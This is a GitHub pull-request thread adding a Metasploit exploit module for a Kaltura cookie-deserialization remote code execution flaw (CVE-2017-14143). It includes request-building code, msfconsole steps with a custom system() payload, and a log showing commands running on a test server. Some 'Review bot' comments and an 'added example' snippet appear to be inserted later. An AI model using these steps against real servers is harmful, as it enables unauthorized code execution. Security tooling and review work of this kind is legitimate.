
Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143) #9114

Merged
merged 4 commits into from
Jan 23, 2018

Conversation

rverton
Contributor

@rverton rverton commented Oct 23, 2017

This PR adds a module to exploit the Kaltura <= 13.1.0 RCE via a cookie deserialization.

Verification example

  • Start msfconsole
  • use exploit/linux/http/kaltura_unserialize_cookie_rce
  • set RHOST host.com
  • set ENTRYID 0_kzn07urz
  • set payload generic/custom
  • set payloadstr "system('uname -a');"
  • run

[screenshot: kaltura_msf]

@mdisec
Contributor

mdisec commented Oct 23, 2017

It's awesome to see that people continue the work and pick up the flag from where we left it.


res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
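Review bot: on the `'uri'` line `entry_id` is interpolated raw into the query string, so an ENTRYID value containing characters such as `&`, `#` or a space yields a malformed request instead of an encoded parameter; moving `list_type` and `entry_id` into `vars_get` lets send_request_cgi URL-encode them and keeps the path literal.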
Contributor

Use vars_get for GET parameters.
Use normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries') format. normalize_uri will concatenate them for you.

Example: #8980

Contributor Author

Using the 'keditorservices,getAllEntries' syntax did not work, but 'keditorservices', 'getAllEntries' did.

Personally I do not find this cleaner than 'index.php/keditorservices/getAllEntries', but I will stick with the (slightly adjusted) suggestion from you now.

Contributor Author

Oh, I guess it was a typo ;)

Contributor

Yes, it was a typo, sorry. Also, this was what the maintainers suggested to me when I sent my first PR ;)


res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
Contributor

Same here.

Use vars_get for GET parameters.
Use normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries') format. normalize_uri will concatenate them for you.

Example: #8980

if res and res.redirect?
print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
elsif res and res.code != 200
print_error("Unexpected response...")
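Review bot: neither branch reports a nil `res` (connection refused or timed out): `res and res.redirect?` and `res and res.code != 200` both evaluate to false when there is no response, so the failure is never surfaced to the user. Add a leading `unless res` branch with its own print_error, and use `&&` instead of the low-precedence `and`, matching `res && res.body.include?(r)` in the check method.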
Contributor

Use single quotes: print_error('Unexpected response...')

)
end

def check
Contributor

As far as I can understand, you need to use a valid entry_id. So why don't you directly send an HTTP request to [target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l and look for 0_28bwo20l in the returned XML file?

Valid entryid:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l

Response

<assets>
<asset id="0_28bwo20l" name="PAISD Mobile App Video" media_type="1" kshow_id="0_duymlto7" url="/content/entry/data/4/278/0_28bwo20l_" ready="1" thumbnail_path="/content/entry/thumbnail/4/278/0_28bwo20l_100001.jpg" credit="rpicon" source_link="file:/opt/kaltura/web/content/uploads/8221424122327.1663_1wfwuh0mo0wck8ccgokg.mov_.mov" duration="283" list_type="show" contributor_screen_name="ANONYMOUS"/>
</assets>

Invalid entryid:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_ffffffff

Response

<assets>

</assets>
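
As an added example (not code from this PR or from the Metasploit module), a small Ruby classifier for the getAllEntries response described in the comment above: it treats an entry_id as valid only when it appears as the id attribute of an asset element, rather than anywhere in the body. The two sample bodies are constructed to mirror the valid and empty responses shown in the comment.

```ruby
# Added example, not part of the PR or the module: decide whether a Kaltura
# getAllEntries response confirms that a given entry_id exists. Rule from the
# review comment: a valid id comes back as an <asset id="..."> element, an
# invalid one yields an <assets> document with no asset elements.

# Constructed sample response for a valid id (attribute set trimmed).
VALID_RESPONSE = <<~XML
  <assets>
  <asset id="0_28bwo20l" name="Sample video" media_type="1" kshow_id="0_duymlto7" url="/content/entry/data/4/278/0_28bwo20l_" ready="1"/>
  </assets>
XML

# Constructed sample response for an unknown id.
EMPTY_RESPONSE = <<~XML
  <assets>

  </assets>
XML

# Collect the id="..." attribute of every <asset> element. \b after "asset"
# keeps <assets> from matching, and \b before "id" keeps kshow_id from
# matching. A plain body.include?(entry_id) would also fire on the id
# showing up inside a url attribute or an error page, which is why the
# comparison is restricted to this attribute.
def asset_ids(body)
  body.scan(/<asset\b[^>]*?\bid="([^"]*)"/).flatten
end

# Returns :valid, :invalid, or :unexpected when the body is not an <assets>
# document at all (for example a login redirect or an HTML error page), so
# that a check routine can report the three cases differently.
def classify_entry(body, entry_id)
  return :unexpected unless body =~ /<assets\b/
  asset_ids(body).include?(entry_id) ? :valid : :invalid
end
```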

@mdisec
Contributor

mdisec commented Oct 23, 2017

Also adding module documentation to this PR would be awesome.

@@ -85,12 +89,29 @@ def check
Exploit::CheckCode::Safe
elsif res && res.body.include?(r)
Exploit::CheckCode::Vulnerable
elsif not self.check_entryid()
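Review bot: `not` in `elsif not self.check_entryid()` binds more loosely than `!` and is flagged by rubocop's Style/Not; `elsif !check_entryid` expresses the same condition in the idiom used elsewhere in the framework.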
Contributor

Do you really need to use self and () in here? I sense a Python developer in here :-)

Contributor

Shouldn't we check the validity of entry_id way before? I would call check_entryid at the very beginning of the check and exploit functions.

Contributor Author

I want to keep the number of requests as low as possible, so check should only test for an invalid id if the request before failed and exploit should not check for a valid id every time a call is made. I'll remove the self. and ().

'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'headers' => {
'Cookie' => "userzone=#{encoded}#{hash}"
Contributor

Instead of defining the cookie within headers, you could directly use it as a parameter of the send_request_cgi method.
Example:

res = send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'blabla'),
  'cookie' => cookie
})

@bwatters-r7
Contributor

Hi there; would you please add documentation to this PR? You can see more about it here: https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation

@Pushpamk
Contributor

Pushpamk commented Nov 13, 2017

@bwatters-r7 Where should I attach documentation for this PR?

@bwatters-r7
Contributor

@Pushpamk, please add a separate markdown document as specified in the guidance:

Save the file and name it after the module name. For example, the filename for ms08-067 is modules/exploits/windows/smb/ms08_067_netapi.rb, so its documentation is documentation/modules/exploits/windows/smb/ms08_067_netapi.md

@rverton
Contributor Author

rverton commented Nov 20, 2017

Sorry, I'm late to the party. I see @Pushpamk already made a new PR for this, awesome! Is there still something needed from me?

@bwatters-r7
Contributor

@rverton no worries; I love to see the community coming together! I have not gotten a chance to dig too much into this, but a quick run of rubocop (https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop) shows there are some stylistic hiccups in the code that could stand updates. The only thing I saw that I'd say has to change is some indentation mix-ups around line 142. If you get a chance, please check out that wiki article and run the code through rubocop for some stylistic changes. Not everything rubocop flags needs to be changed, as the document states, but I do take rubocop's suggestions to heart when I can. Otherwise, this just needs me to finish up some other tasks so it comes up in my queue. Thanks!

@rverton
Contributor Author

rverton commented Nov 21, 2017

@bwatters-r7 all right, I just added the stylistic things suggested from rubocop. I hope this fits better now ;)

@bwatters-r7
Contributor

I ran through https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md to try and install kaltura, but it failed both times, probably because I'm unfamiliar with the application. Is there an easier/faster installer around?

@rverton
Contributor Author

rverton commented Nov 28, 2017

Setting up kaltura was time-consuming. I failed several times until I noticed that you need to have a good amount of memory available, otherwise it will fail with strange error messages during the installation. The setup script is also error-prone. I don't have a faster way to install, sorry :/

@bwatters-r7
Contributor

bwatters-r7 commented Nov 28, 2017

When you say "a good amount," can you quantify that? 1 GB, 8 GB? 32 GB?

@rverton
Contributor Author

rverton commented Nov 29, 2017

A 512MB VM failed for me, a 2GB one worked.

@bwatters-r7
Contributor

If you have a pcap of this working, please send it in. I have not had time to try building Kaltura again.

@rverton
Contributor Author

rverton commented Jan 10, 2018

Hi @bwatters-r7,
I agree, building an old version is time consuming. I found an old Kaltura version here in a Vagrant machine. It's 13.4 but with the old and vulnerable kalturaAction.class.php file before it was fixed here.

This is the execution:

$ cat msf.rc 
use exploit/linux/http/kaltura_unserialize_cookie_rce
set RHOST pwnbox
set RPORT 8080
set PAYLOAD generic/custom
set PAYLOADSTR "system('id');"
set ENTRYID 0_b45ita8n
check
run
exit
$ msfconsole -r msf.rc 
[...snip...]
[*] Processing msf.rc for ERB directives.
resource (msf.rc)> use exploit/linux/http/kaltura_unserialize_cookie_rce
resource (msf.rc)> set RHOST pwnbox
RHOST => pwnbox
resource (msf.rc)> set RPORT 8080
RPORT => 8080
resource (msf.rc)> set PAYLOAD generic/custom
PAYLOAD => generic/custom
resource (msf.rc)> set PAYLOADSTR "system('id');"
PAYLOADSTR => system('id');
resource (msf.rc)> set ENTRYID 0_b45ita8n
ENTRYID => 0_b45ita8n
resource (msf.rc)> check
[+] pwnbox:8080 The target is vulnerable.
resource (msf.rc)> run
[*] Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Exploit completed, but no session was created.
resource (msf.rc)> exit

I also attached a tcpdump:
kaltura_rce.dump.zip

@bwatters-r7
Contributor

Thanks, @rverton! Likely not going to get to it this week, but I will try to review it next week.

@bwatters-r7 bwatters-r7 merged commit 52356e0 into rapid7:master Jan 23, 2018
bwatters-r7 added a commit that referenced this pull request Jan 23, 2018
Merge branch 'land-9114' into upstream-master
@bwatters-r7
Contributor

bwatters-r7 commented Jan 23, 2018

Release Notes

The exploits/linux/http/kaltura_unserialize_cookie_rce module has been added to the framework. It allows remote code execution through Kaltura video server software versions prior to 13.1.0. A valid entry_id is required for this exploit, and can be obtained from any media resource published on the kaltura installation.

jmartin-tech pushed a commit to jmartin-tech/metasploit-framework that referenced this pull request Jan 24, 2018